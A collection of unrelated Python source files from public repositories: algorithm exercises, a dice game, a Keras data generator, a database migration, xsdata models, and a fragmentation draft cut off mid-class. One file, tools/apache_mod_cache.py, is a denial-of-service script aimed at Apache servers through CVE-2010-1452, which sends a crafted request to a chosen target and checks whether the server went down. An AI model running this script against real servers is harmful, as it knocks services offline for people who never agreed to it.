max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content | score | int_score |
|---|---|---|---|---|---|---|
src/inversion/count_inversions.py | sahayabhishek/learning-algorithms | 0 | 12773151 | <filename>src/inversion/count_inversions.py
# Question
#
# The input file 'IntegerArray.txt' contains all of the 100,000 integers between 1 and 100,000 (inclusive) in some
# order, with no integer repeated.
#
# The task is to compute the number of inversions in the file given, where the i^{th} row of the file indicates
# the i^{th} entry of an array.
#
# load_arr reads data in a file and loads it into an array
def load_arr(file_name):
arr = []
with open(file_name) as fp:
lines = fp.readlines()
for line in lines:
arr.append(int(line.strip()))
return arr
# sort_and_count_split_inversions performs merge logic for the two sorted arrays and counts the inversions between
# those 2 arrays.
def sort_and_count_split_inversions(left_arr, right_arr):
left_arr_len = len(left_arr)
right_arr_len = len(right_arr)
sorted_arr = [None] * (left_arr_len + right_arr_len)
inv_count = 0
i = j = k = 0
while i < left_arr_len and j < right_arr_len:
if left_arr[i] <= right_arr[j]:
sorted_arr[k] = left_arr[i]
i += 1
else:
inv_count += (left_arr_len - i)
sorted_arr[k] = right_arr[j]
j += 1
k += 1
while i < left_arr_len:
sorted_arr[k] = left_arr[i]
i += 1
k += 1
while j < right_arr_len:
sorted_arr[k] = right_arr[j]
j += 1
k += 1
return inv_count, sorted_arr
# sort_and_count_inversions method counts the number of inversions in the array and also returns a sorted array.
# Array is sorted using merge sort algorithm. Time complexity of merge sort is O(n*log(n)).
def sort_and_count_inversions(arr):
length_arr = len(arr)
# Base case for recursion to exit
if length_arr == 1:
return 0, arr
else:
# Split the array in two and then recursively sort and count inversions in each half.
# Then count the split inversions (i.e. inversions between the two halves using the sorted array).
# Sum total of these 3 counts of inversion gives the number of inversions in the array.
middle_index = length_arr // 2
left_arr = arr[:middle_index]
right_arr = arr[middle_index:]
left_inv_count, left_arr_sorted = sort_and_count_inversions(left_arr)
right_inv_count, right_arr_sorted = sort_and_count_inversions(right_arr)
split_inv_count, arr_sorted = sort_and_count_split_inversions(left_arr_sorted, right_arr_sorted)
return left_inv_count + right_inv_count + split_inv_count, arr_sorted
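# Worked example (added for clarity; not part of the original file):
# sort_and_count_inversions([3, 1, 2]) returns (2, [1, 2, 3]) -- the two
# inversions are the pairs (3, 1) and (3, 2). The key step is
# `inv_count += (left_arr_len - i)`: when right_arr[j] is merged ahead of
# left_arr[i], it is smaller than every element still remaining in the left
# half, so all of those pairs are counted at once.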
if __name__ == '__main__':
arr = load_arr('IntegerArray.txt')
cnt, sorted_arr = sort_and_count_inversions(arr)
print(cnt)
| 4.15625 | 4 |
300-/659.py | yshshadow/Leetcode | 0 | 12773152 | # You are given an integer array sorted in ascending order (may contain duplicates), you need to split them into several subsequences, where each subsequences consist of at least 3 consecutive integers. Return whether you can make such a split.
#
# Example 1:
# Input: [1,2,3,3,4,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3
# 3, 4, 5
# Example 2:
# Input: [1,2,3,3,4,4,5,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3, 4, 5
# 3, 4, 5
# Example 3:
# Input: [1,2,3,4,4,5]
# Output: False
# Note:
# The length of the input is in range of [1, 10000]
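# Added note on the greedy invariant (not in the original solution): `count`
# tracks how many copies of each value remain unassigned, while `tails` counts
# subsequences that currently need value x to continue. Each x either extends
# an existing run (tails[x] > 0) or must open a fresh run of length >= 3 by
# reserving x+1 and x+2; otherwise no valid split exists. For [1,2,3,3,4,5]:
# the 1 opens (1,2,3) by consuming 2 and 3, the remaining 3 opens (3,4,5),
# and both runs reach length 3, so the answer is True.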
import collections
class Solution(object):
def isPossible(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
count = collections.Counter(nums)
tails = collections.Counter()
for x in nums:
if count[x] == 0:
continue
elif tails[x] > 0:
tails[x] -= 1
tails[x + 1] += 1
elif count[x + 1] > 0 and count[x + 2] > 0:
count[x + 1] -= 1
count[x + 2] -= 1
tails[x + 3] += 1
else:
return False
count[x] -= 1
return True
s = Solution()
print(s.isPossible([1,2,3,3,4,4,5,5]))  # prints True | 3.859375 | 4 |
conf/metadata.py | underworldcode/petsc4py | 3 | 12773153 | <filename>conf/metadata.py<gh_stars>1-10
classifiers = """
License :: OSI Approved :: BSD License
Operating System :: POSIX
Intended Audience :: Developers
Intended Audience :: Science/Research
Programming Language :: C
Programming Language :: C++
Programming Language :: Cython
Programming Language :: Python
Programming Language :: Python :: 2
Programming Language :: Python :: 3
Topic :: Scientific/Engineering
Topic :: Software Development :: Libraries :: Python Modules
"""
keywords = """
scientific computing
parallel computing
"""
metadata = {
'author' : '<NAME>',
'author_email' : '<EMAIL>',
'classifiers' : [c for c in classifiers.split('\n') if c],
'keywords' : [k for k in keywords.split('\n') if k],
'license' : 'BSD',
'platforms' : ['POSIX'],
'maintainer' : '<NAME>',
'maintainer_email' : '<EMAIL>',
}
| 1.703125 | 2 |
capsnets_laseg/io/transforms_gens.py | jchen42703/CapsNetsLASeg | 17 | 12773154 | <filename>capsnets_laseg/io/transforms_gens.py<gh_stars>10-100
import numpy as np
from keras_med_io.utils.custom_augmentations import get_positive_idx, get_random_slice_idx
from keras_med_io.utils.shape_io import reshape
from keras_med_io.base_generators.base_gens import BaseTransformGenerator
import nibabel as nib
import os
class Transformed2DGenerator(BaseTransformGenerator):
"""
Loads data, slices them based on the number of positive slice indices and applies data augmentation with `batchgenerators.transforms`.
* Supports channels_last
* .nii files should not have the batch_size dimension
Attributes:
list_IDs: list of filenames
data_dirs: list of paths to both the input dir and labels dir
batch_size: The number of images you want in a single batch
n_pos: The number of positive class 2D images to include in a batch
transform (Transform instance): If you want to use multiple Transforms, use the Compose Transform.
max_patient_shape (tuple): representing the maximum patient shape in a dataset; i.e. ((z,)x,y)
* Note: If you have 3D medical images and want 2D slices and don't want to overpad the slice dimension (z),
provide a shape that is only 2D (x,y).
steps_per_epoch: number of batches to yield per epoch
pos_mask: boolean representing whether or not to output the positive masks (X*Y)
* If True, inputs are for capsule networks with a decoder.
* If False, inputs are for everything else.
shuffle: boolean
"""
def __init__(self, list_IDs, data_dirs, batch_size = 2, n_pos = 1,
transform = None, max_patient_shape = (256, 320), steps_per_epoch = 1536, pos_mask = True, shuffle = True):
BaseTransformGenerator.__init__(self, list_IDs = list_IDs, data_dirs = data_dirs, batch_size = batch_size,
n_channels = 1, n_classes = 1, ndim = 2,
transform = transform, max_patient_shape = max_patient_shape,
steps_per_epoch = steps_per_epoch, shuffle = shuffle)
self.n_pos = n_pos
self.pos_mask = pos_mask
if n_pos == 0:
print("WARNING! Your data is going to be randomly sliced.")
self.mode = "rand"
elif n_pos == batch_size:
print("WARNING! Your entire batch is going to be positively sampled.")
self.mode = "pos"
else:
self.mode = "bal"
if len(self.max_patient_shape) == 2:
self.dynamic_padding_z = True # no need to pad the slice dimension
def __getitem__(self, idx):
"""
Defines the fetching and on-the-fly preprocessing of data.
Args:
idx: the id assigned to each worker
Returns:
if self.pos_mask is True:
([X, Y], [Y, pos_mask]): multi-inputs for the capsule network decoder
elif self.pos_mask is False:
(X, Y): a batch of transformed data/labels based on the n_pos attribute.
"""
# file names
max_n_idx = (idx + 1) * self.batch_size
if max_n_idx > self.indexes.size:
print("Adjusting for idx: ", idx)
self.adjust_indexes(max_n_idx)
indexes = self.indexes[idx*self.batch_size:(idx+1)*self.batch_size]
# Fetches batched IDs for a thread
list_IDs_temp = [self.list_IDs[k] for k in indexes]
# balanced sampling
if self.mode == "bal":
# generating data for both positive and randomly sampled data
X_pos, Y_pos = self.data_gen(list_IDs_temp[:self.n_pos], pos_sample = True)
X_rand, Y_rand = self.data_gen(list_IDs_temp[self.n_pos:], pos_sample = False)
# concatenating all the corresponding data
X, Y = np.concatenate([X_pos, X_rand], axis = 0), np.concatenate([Y_pos, Y_rand], axis = 0)
# shuffling the order of the positive/random patches
out_rand_indices = np.arange(0, X.shape[0])
np.random.shuffle(out_rand_indices)
X, Y = X[out_rand_indices], Y[out_rand_indices]
# random sampling
elif self.mode == "rand":
X, Y = self.data_gen(list_IDs_temp, pos_sample = False)
elif self.mode == "pos":
X, Y = self.data_gen(list_IDs_temp, pos_sample = True)
# data augmentation
if self.transform is not None:
X, Y = self.apply_transform(X, Y)
# print("Getting item of size: ", indexes.size, "out of ", self.indexes.size, "with idx: ", idx, "\nX shape: ", X.shape)
assert X.shape[0] == self.batch_size, "The outputted batch doesn't match the batch size."
if self.pos_mask:
pos_mask = X * Y
return ([X, Y], [Y, pos_mask])
elif not self.pos_mask:
return (X, Y)
def data_gen(self, list_IDs_temp, pos_sample):
"""
Generates a batch of data.
Args:
list_IDs_temp: batched list IDs; usually done by __getitem__
pos_sample: boolean on if you want to sample a positive image or not
Returns:
tuple of two numpy arrays: x, y
"""
images_x = []
images_y = []
for id in list_IDs_temp:
# loads data as a numpy arr and then changes the type to float32
x_train = np.expand_dims(np.load(os.path.join(self.data_dirs[0], id)), -1)
y_train = np.expand_dims(np.load(os.path.join(self.data_dirs[1], id)), -1)
# Padding to the max patient shape (so the arrays can be stacked)
if self.dynamic_padding_z: # for when you don't want to pad the slice dimension (bc that usually changes in images)
pad_shape = (x_train.shape[0], ) + self.max_patient_shape
elif not self.dynamic_padding_z:
pad_shape = self.max_patient_shape
x_train = reshape(x_train, x_train.min(), pad_shape + (self.n_channels, ))
y_train = reshape(y_train, 0, pad_shape + (self.n_classes, ))
# extracting slice:
if pos_sample:
slice_idx = get_positive_idx(y_train)[0]
elif not pos_sample:
slice_idx = get_random_slice_idx(x_train)
images_x.append(x_train[slice_idx]), images_y.append(y_train[slice_idx])
input_data, seg_masks = np.stack(images_x), np.stack(images_y)
return (input_data, seg_masks)
| 2.625 | 3 |
website.py | GVineeta/movie-trailer-website_2 | 0 | 12773155 | # website.py
# Created by: <NAME>
# Date: 5 June 2015
# Purpose: This file is for instantiating all the movie objects and then
# calling display_page.py to render the movies in an html page
import display_page
import movie
# Creating objects for my favourite movies
cars = movie.Movie(
"Cars",
"Story about live cars",
"2006",
"Pixar Animation Studios",
"Walt Disney Pictures",
"<NAME>",
"Golden Globe Award for Best Animated Feature Film",
"https://upload.wikimedia.org/wikipedia/en/3/34/Cars_2006.jpg",
"https://www.youtube.com/watch?v=WGByijP0Leo"
)
ratatouille = movie.Movie(
"Ratatouille",
"Anybody can cook",
"2007",
"Pixar Animation Studios",
"Walt Disney Pictures",
"<NAME>",
"Academy Award for Best Animated Feature",
"https://upload.wikimedia.org/wikipedia/en/5/50/RatatouillePoster.jpg",
"https://www.youtube.com/watch?v=c3sBBRxDAqk"
)
tangled = movie.Movie(
"Tangled",
"Girl with long golden red hairs",
"2010",
"Walt Disney Animation Studios",
"Walt Disney Pictures",
"<NAME> & <NAME>",
"Best Original Song at the 83rd Academy Awards",
"https://upload.wikimedia.org/wikipedia/en/a/a8/Tangled_poster.jpg",
"https://www.youtube.com/watch?v=pyOyBVXDJ9Q"
)
brave = movie.Movie(
"Brave",
"Girl with lot of courage",
"2012",
"Pixar Animation Studios",
"Walt Disney Pictures",
"Mark Andrews and <NAME>",
"Academy Award,the Golden Globe,and the BAFTA Award for Best \
Animated Feature Film.",
"https://upload.wikimedia.org/wikipedia/en/9/96/Brave_Poster.jpg",
"https://www.youtube.com/watch?v=6CKcqIahedc"
)
# Create an array of all my favourite movies
movies_list = [cars, ratatouille, tangled, brave]
# Call another python script to render the movies on an html page
display_page.open_movies_page(movies_list)
# EOF
| 2.921875 | 3 |
Code/game_projects/Roll-a-dice/dice.py | Kevinjadia/Hacktoberfest_DSA_2021 | 4 | 12773156 | <gh_stars>1-10
import random
from math import ceil, sqrt
import colored
from colored import stylize
_MAG_BOLD = colored.fg("magenta") + colored.attr("bold")
_YELLOW_BOLD = colored.fg("yellow_4b") + colored.attr("bold")
_GREEN_BOLD = colored.fg("green") + colored.attr("bold")
class Die:
def __init__(self, faces_count, eyes="o ", corner="+"):
"""Compute statistics about places of eyes on a die face"""
if len(eyes) != 2:
raise ValueError("Excpected two choices for eyes parameter")
self.eyes = eyes
width = int(sqrt(faces_count))
height = ceil(faces_count / width)
# Fix lengths for nearly square ascii-art
while height > width + 1:
width += 1
height = ceil(faces_count / width)
# Account for python 2 ceil returning float
height = int(height)
if not height % 2:
# Fix height to have a middle point
height += 1
# Values to generate a specific face
self.limit = width * height
self.faces = faces_count
# Template of the face
pattern = " ".join("{}" for _ in range(width))
pattern = "| {} |".format(pattern)
top = corner + ("-" * (2 * width + 1)) + corner
middle = " ".join("{}" for _ in range(width // 2))
middle = "| " + middle + " " * (width % 2)
self.pattern = "\n".join(
[top] + [pattern for _ in range(height // 2)] + [middle]
)
# Size of the ascii-art
self.width = len(top)
self.height = self.pattern.count("\n") * 2 + 1
def face(self, roll):
"""Return the full face of the roll for this die.
roll is accounted in a 0-base fashion.
"""
if not (0 <= roll < self.faces):
raise ValueError("Roll is higher than die size or negative")
eye_full, eye_empty = self.eyes
# Fill the pattern with correct eye for current roll
upper_face = self.pattern.format(
*(eye_empty if roll < i else eye_full for i in range(1, self.limit, 2))
)
# Return mirrored pattern string with changing middle to get a full face
return upper_face + self.eyes[roll & 1] + upper_face[::-1]
def print_dice_rolls(faces_count, rolls, zero_based=False, max_width=72, eyes="o "):
"""Pretty print all rolls using faces_count-sided di(c)e."""
# Set up some default values
die = Die(faces_count, eyes)
face_width = die.width
# Will try to collate output of multiple dice rolls into lines
# of up to max_width length
output_buffer = ["" for _ in range(die.height)]
# Output the dice rolls using output_buffer
# Make sure to use 0-based rolls
for roll in (r + zero_based - 1 for r in rolls):
# Flush buffer if too wide
if len(output_buffer[0]) + face_width >= max_width:
for idx, line in enumerate(output_buffer):
pp(line, _YELLOW_BOLD)
output_buffer[idx] = ""
# Build a proper face according to faces_count and roll
current_face = die.face(roll)
# Append die to output_buffer
for idx, line in enumerate(current_face.split("\n")):
output_buffer[idx] += line + " "
# Print remaining dice in output_buffer
if output_buffer[0]:
for line in output_buffer:
pp(line, _YELLOW_BOLD)
def pp(text, style=_MAG_BOLD):
""" Pretty-print with style """
print(stylize(text, style))
def Rolldice(rolls):
rolles = [random.randint(1, 6) for x in range(0, rolls)]
print("\n\n")
print_dice_rolls(6, rolles)
print("\n\n")
main()
def main():
pp("1. Roll a dice") # roll for one dice
pp("2. Roll multiple dice") # roll for multiple dice
pp("3. Exit from Game\n\n") # exit() function to exit from game.
choice = int(input(stylize("Enter choice: ", _GREEN_BOLD)))
if choice == 1:
Rolldice(1)
if choice == 2:
rolls = int(input(stylize("Enter no. of rolls: ", _GREEN_BOLD)))
Rolldice(rolls) # call for multiple rolls
if choice == 3:
print("Out of the Game")
exit()
if __name__ == "__main__":
pp("\n\n---====Roll A Dice!====---\n\n", _GREEN_BOLD)
main()
| 2.96875 | 3 |
tools/apache_mod_cache.py | crempp/bin | 0 | 12773157 | #!/usr/bin/python
import socket, getopt, sys
try:
opts, args = getopt.getopt(sys.argv[1:], "ht:")
except getopt.GetoptError, err:
print str(err)
exit()
def banner():
print "************************************************"
print "**|''''''''''''''''''''''''''''''''''''''''''|**"
print "**|Apache DoS tool |**"
print "**|By: <NAME> |**"
print "**|Email: anarchy.ang31 [@] gmail |**"
print "**|http://hha.zapto.org |**"
print "**|- |**"
print "**|Usage: |**"
print "**| $ python apacheDoS-CVE20101452.py -h |**"
print "**| |**"
print "**|,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,|**"
print "************************************************"
print ""
for o, a in opts:
if o in ("-h", "--help"):
banner()
print "-h: This message."
print "-t <target>: The target server you want to DoS"
print "i.e. user@user:~/$ python apacheDoS-CVE20101452.py -t www.target.com"
print "This script uses the CVE-2010-1452 bug to DoS apache servers."
print "More info: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1452"
exit()
elif o in ("-t", "--target"):
server = a
else:
assert False, "unhandled option"
try:
server
except NameError:
print "No mode set."
print "Try -h"
exit()
banner()
print "Starting DoS attack"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#now connect to the web server on port 80
# - the normal http port
s.connect((server, 80))
s.send("GET http://"+server+" HTTP/1.0")
print "Packets sent\nChecking servers status....."
s.close()
f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
f.connect((server, 80))
print "Server not open to DoS :("
f.close()
except:
print "DoS done xD"
| 2.53125 | 3 |
tests/test_modify.py | ganesh-k13/titanium-rhythm | 0 | 12773158 | <filename>tests/test_modify.py
import pytest
import string
import random
import os
import pkg_resources
from titanium_rhythm.modify import Song
SONG_FOLDER_PATH = pkg_resources.resource_filename('titanium_rhythm', 'songs/')
def test_modify():
rand_string = ''.join(random.choice(string.ascii_uppercase) for _ in range(10))
# dirpath, dirs, files = next(os.walk(SONG_FOLDER_PATH))
song_file = os.path.join(SONG_FOLDER_PATH, '23.mp3')
s = Song(song_file)
# s.modify(title = rand_string, artist = rand_string, album = rand_string, genre = 'rock', lyrics = rand_string, image_path = os.path.join(SONG_FOLDER_PATH, 'images.png'))
s.modify_title(title = rand_string)
s.modify_artist(artist = rand_string)
s.modify_album(album = rand_string)
s.modify_genre(genre = 'rock')
s.modify_lyrics(lyrics = rand_string)
s.modify_image_path(image_path = 'https://en.wikipedia.org/wiki/Counting_Stars#/media/File:OneRepublic_Counting_Stars_cover.png')
del(s)
new_s = Song(song_file)
tag_info = new_s.get_tag()
assert(tag_info['title'] == rand_string)
assert(tag_info['artist'] == rand_string)
assert(tag_info['album'] == rand_string)
assert(tag_info['genre'].name == 'Rock')
assert(tag_info['lyrics'] == rand_string)
| 2.453125 | 2 |
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/template/devicenotfound.py | jbronikowski/genielibs | 94 | 12773159 | <filename>pkgs/sdk-pkg/src/genie/libs/sdk/triggers/template/devicenotfound.py
''' triggerNoDevice template '''
# import ats
from ats import aetest
# import genie infra
from genie.harness.base import Trigger
@aetest.skip(reason='The device provided does not exist in the testbed yaml')
class TriggerDeviceNotFound(Trigger):
''' Trigger that is used when a device is not found '''
pass
| 1.742188 | 2 |
migrations/versions/12b0e8390634_add_tutor_and_moderator.py | iKintosh/Tink2020_LMS | 1 | 12773160 | """add Tutor and Moderator
Revision ID: 12b0e8390634
Revises: <PASSWORD>
Create Date: 2020-01-12 12:41:22.787337
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '12b0e8390634'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('moderator',
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('course_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('user_id', 'course_id')
)
op.create_table('tutor',
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('course_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('user_id', 'course_id')
)
op.add_column('answer', sa.Column('homework_id', sa.Integer(), nullable=True))
op.add_column('answer', sa.Column('user_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'answer', 'user', ['user_id'], ['id'])
op.create_foreign_key(None, 'answer', 'homework', ['homework_id'], ['id'])
op.add_column('student', sa.Column('entry_year', sa.Integer(), nullable=True))
op.add_column('student', sa.Column('user_id', sa.Integer(), nullable=False))
op.drop_constraint('student_id_fkey', 'student', type_='foreignkey')
op.create_foreign_key(None, 'student', 'user', ['user_id'], ['id'])
op.drop_column('student', 'id')
op.add_column('user', sa.Column('about_me', sa.String(), nullable=True))
op.add_column('user', sa.Column('city', sa.String(), nullable=True))
op.add_column('user', sa.Column('facebook_link', sa.String(), nullable=True))
op.add_column('user', sa.Column('instagram_link', sa.String(), nullable=True))
op.add_column('user', sa.Column('is_moderator', sa.Boolean(), nullable=True))
op.add_column('user', sa.Column('is_tutor', sa.Boolean(), nullable=True))
op.add_column('user', sa.Column('linkedin_link', sa.String(), nullable=True))
op.add_column('user', sa.Column('middle_name', sa.String(), nullable=True))
op.add_column('user', sa.Column('password_hash', sa.String(), nullable=True))
op.add_column('user', sa.Column('vk_link', sa.String(), nullable=True))
op.drop_column('user', 'status')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('user', sa.Column('status', sa.VARCHAR(), autoincrement=False, nullable=True))
op.drop_column('user', 'vk_link')
op.drop_column('user', 'password_hash')
op.drop_column('user', 'middle_name')
op.drop_column('user', 'linkedin_link')
op.drop_column('user', 'is_tutor')
op.drop_column('user', 'is_moderator')
op.drop_column('user', 'instagram_link')
op.drop_column('user', 'facebook_link')
op.drop_column('user', 'city')
op.drop_column('user', 'about_me')
op.add_column('student', sa.Column('id', sa.INTEGER(), autoincrement=False, nullable=False))
op.drop_constraint(None, 'student', type_='foreignkey')
op.create_foreign_key('student_id_fkey', 'student', 'user', ['id'], ['id'])
op.drop_column('student', 'user_id')
op.drop_column('student', 'entry_year')
op.drop_constraint(None, 'answer', type_='foreignkey')
op.drop_constraint(None, 'answer', type_='foreignkey')
op.drop_column('answer', 'user_id')
op.drop_column('answer', 'homework_id')
op.drop_table('tutor')
op.drop_table('moderator')
# ### end Alembic commands ###
| 1.914063 | 2 |
xsdata/formats/dataclass/models/generics.py | pashashocky/xsdata | 0 | 12773161 | <gh_stars>0
from dataclasses import dataclass
from dataclasses import field
from typing import Dict
from typing import Generic
from typing import List
from typing import Optional
from typing import TypeVar
from xsdata.formats.dataclass.models.elements import XmlType
T = TypeVar("T", bound=object)
@dataclass
class AnyElement:
"""
Generic model to bind xml document data to wildcard fields.
:param qname: The element's qualified name
:param text: The element's text content
:param tail: The element's tail content
:param children: The element's list of child elements.
:param attributes: The element's key-value attribute mappings.
"""
qname: Optional[str] = field(default=None)
text: Optional[str] = field(default=None)
tail: Optional[str] = field(default=None)
children: List[object] = field(
default_factory=list, metadata={"type": XmlType.WILDCARD}
)
attributes: Dict[str, str] = field(
default_factory=dict, metadata={"type": XmlType.ATTRIBUTES}
)
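# Illustrative example (added): an element such as <p lang="en">hi</p> would
# bind to AnyElement(qname="p", text="hi", attributes={"lang": "en"}).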
@dataclass
class DerivedElement(Generic[T]):
"""
Generic model wrapper for type substituted elements.
Example: <b xsi:type="a">...</b>
:param qname: The element's qualified name
:param value: The wrapped value
:param type: The real xsi:type
"""
qname: str
value: T
type: Optional[str] = None
| 2.546875 | 3 |
test_frame/best_simple_example/test_publish.py | aopusd/distributed_framework | 2 | 12773162 | # -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/8/8 0008 14:57
import time
from test_frame.best_simple_example.test_consume import consumer
consumer.publisher_of_same_queue.clear()
# Instead of publisher_of_same_queue you can also obtain a publisher with the get_publisher function, but you must manually make sure the consumer's queue name matches the publisher's queue name and that the broker (middleware) kind is the same. Usage as follows.
# pb = get_publisher('queue_test2',broker_kind=6)
# pb.publish({'a': i, 'b': 2 * i})
# [consumer.publisher_of_same_queue.publish({'a': i, 'b': 2 * i}) for i in range(100)]
for i in range(10000):
time.sleep(0.05)
consumer.publisher_of_same_queue.publish({'a': i, 'b': 2 * i}) | 2.5 | 2 |
challenges/2020/13-shuttleSearch/python/partTwo.py | codemicro/adventOfCode | 9 | 12773163 | def partTwo(instr: str) -> int:
# This is the parsing section
service_list = instr.strip().split("\n")[-1].split(",")
eqns = []
for i, svc in enumerate(service_list):
if svc == "x":
continue
svc = int(svc)
v = 0
if i != 0:
v = svc - i # This is the only maths stuff in the parsing
eqns.append((v, svc))
# This is the maths section
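# Added note on the Chinese Remainder Theorem step below: each (bi, ni) pair
# encodes the congruence t ≡ bi (mod ni). Because the bus IDs are pairwise
# coprime, CRT yields a unique solution modulo n = n1*n2*...*nk, computed as
# t = sum(bi * Ni * yi) mod n, where Ni = n / ni and yi is the modular
# inverse of Ni modulo ni.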
n = 1
for (_, v) in eqns:
n *= v
sigma_x = 0
for (bi, ni) in eqns:
# ni divides n exactly, so use integer floor division to stay in int
# (pow() with exponent -1 requires integer arguments, and int(n / ni)
# would lose precision for the very large n this puzzle produces)
Ni = n // ni
yi = pow(Ni, -1, ni) # https://stackoverflow.com/a/9758173
sigma_x += bi * Ni * yi
return sigma_x % n
| 3.390625 | 3 |
src/old/fraglogic.py | saguilarDevel/open_schc | 1 | 12773164 | #---------------------------------------------------------------------------
import warnings
import struct
import sys
sys.path.append("../../PLIDO-tanupoo")
import fragment
#import schc_fragment as fragment
sys.path.append("../python")
import BitBuffer as BitBufferModule
#---------------------------------------------------------------------------
class BitBuffer_XXX(BitBufferModule.BitBuffer):
#XXX debug and put in BitBuffer.py
def __init__(self, *args, **kwargs):
BitBufferModule.BitBuffer.__init__(self, *args, **kwargs)
def add_bits(self, bits_as_long_int, nb_bits):
# walk from the most-significant of the nb_bits bits down to bit 0
for i in range(nb_bits - 1, -1, -1):
self.add_bit(bits_as_long_int & (1 << i))
pop_bit = BitBufferModule.BitBuffer.next_bit
def pop_bits(self, nb_bits):
result = 0
for i in range(nb_bits - 1, -1, -1):
if self.pop_bit():
result |= (1 << i)
return result
def pop_byte(self):
return self.pop_bits(8)
def pop_bytes(self, nb_bytes):
return bytearray([self.pop_byte() for i in range(nb_bytes)])
def get_content(self):
return self._buf[:]
class FakeBitBuffer:
def __init__(self, content = []):
self.content = content[:]
def add_bits(self, bits_as_long, nb_bits):
self.content.append((bits_as_long, nb_bits))
def get_bits(self, nb_bits):
bits_as_long, added_nb_bits = self.content.pop(0)
assert nb_bits == added_nb_bits
return bits_as_long
def get_content(self):
return self.content[:]
def test_BitBuffer():
bitbuffer = FakeBitBuffer()
bitbuffer.add_bits(0xf, 4)
bitbuffer.add_bits(0, 2)
bitbuffer.add_bits(0x1, 2)
for i in range(3):
bitbuffer.add_bits(0, 1)
bitbuffer.add_bits(0x1, 1)
bitbuffer.add_bits(0x3, 2)
print(bitbuffer.get_content())
#print([bin(x) for x in bitbuffer.get_content])
#test_BitBuffer(); exit_now()
#---------------------------------------------------------------------------
RELIABILITY_OPTION_LIST = ["no-ack", "window", "ack-on-error"]
class SchcFragmentFormat:
def __init__(self, R, T, N, M, mode="window"):
if mode not in RELIABILITY_OPTION_LIST:
raise ValueError("unknown reliability option", mode)
self.R = R
self.T = T
self.N = N
self.M = M
self.mode = mode
if self.mode == "no-ack":
self.window_field_bitsize = 0
else: self.window_field_bitsize = 1
# 880 fragments format this field has a size of R - T - N - 1 bits when
# 881 Window mode is used. In No ACK mode, the Rule ID field has a size of
# 882 R - T - N bits see format section.
self.rule_id_bitsize = (self.R - self.T - self.N
- self.window_field_bitsize)
assert self.rule_id_bitsize >= 0
assert self.N >= 1
assert self.mode == "window" # XXX in this version of the code
def get_all_0(self):
return 0
def get_all_1(self):
return 2**self.N - 1
def get_fcn_max(self):
"""maximum value of the FCN, itself included"""
self.fcn_max = 2**self.N - 2
return self.fcn_max
def pack_fragment(self, rule_id, dtag, window_index, advertized_fcn,
payload, mic = b""):
# 1013 <------------ R ---------->
# 1014 <--T--> 1 <--N-->
# 1015 +-- ... --+- ... -+-+- ... -+---...---+
# 1016 | Rule ID | DTag |W| FCN | payload |
# 1017 +-- ... --+- ... -+-+- ... -+---...---+
#
# and
#
# 1105 <------------ R ------------>
# 1106 <- T -> 1 <- N -> <---- M ----->
# 1107 +-- ... --+- ... -+-+- ... -+---- ... ----+---...---+
# 1108 | Rule ID | DTag |W| 11..1 | MIC | payload |
# 1109 +-- ... --+- ... -+-+- ... -+---- ... ----+---...---+
bit_buffer = FakeBitBuffer()
bit_buffer.add_bits(rule_id, self.rule_id_bitsize)
bit_buffer.add_bits(dtag, self.T)
bit_buffer.add_bits(window_index%2, 1)
bit_buffer.add_bits(advertized_fcn, self.N)
assert ( (len(mic) == 0 and advertized_fcn != self.get_all_1())
or (len(mic) != 0 and advertized_fcn == self.get_all_1()))
if len(mic) > 0:
bit_buffer.add_bits(mic, self.M)
bit_buffer.add_bits(payload, 8*len(payload))
return bit_buffer.get_content()
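# Illustrative example (added): with R=16, T=4, N=4 (so rule_id_bitsize = 7),
# pack_fragment(rule_id=5, dtag=1, window_index=0, advertized_fcn=6,
# payload=b"A") returns the FakeBitBuffer content
# [(5, 7), (1, 4), (0, 1), (6, 4), (b"A", 8)].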
def pack_empty_fragment(self, advertized_fcn):
# 1083 <------------ R ------------>
# 1084 <- T -> 1 <- N ->
# 1085 +-- ... --+- ... -+-+- ... -+
# 1086 | Rule ID | DTag |W| 0..0 | TODO
# 1087 +-- ... --+- ... -+-+- ... -+
# 1088
# 1089 Figure 13: All-0 empty format fragment
# XXX
raise RuntimeError("Not implemented yet: XXX")
def unpack_fragment_or_ack(self):
pass
def pack_ack(self, XXX):
pass
#---------------------------------------------------------------------------
INTER_FRAGMENT_DELAY = 1.0 # seconds
WAIT_BITMAP_TIMEOUT = 5.0 # seconds
class WindowAckModeSender:
"""The fragmentation manager handles the logic of the fragment sending etc.
"""
def __init__(self, system_manager, fragment_format_XXX_unused, full_packet,
rule_id, dtag, window_max_size, fragment_size):
self.rule_id = rule_id
self.dtag = dtag
R = 16 # header size
T = 4 # DTag size
N = 4 # FCN size
M = 8 # MIC size
BITMAP_SIZE = 8 # bits
self.system_manager = system_manager
# XXX: use soichi code again:
#fragment.fp = fragment_format #XXX: hack
#self.fragment = fragment.fragment(
# srcbuf=full_packet, rule_id=rule_id, dtag=dtag,
# noack=False, window_size=window_size)
##self.fragment = fragment.fragment(
## srcbuf=full_packet, dtag=dtag, rid=rule_id)
#print(self.fragment.__dict__) #XXX
self.fragment_size = fragment_size
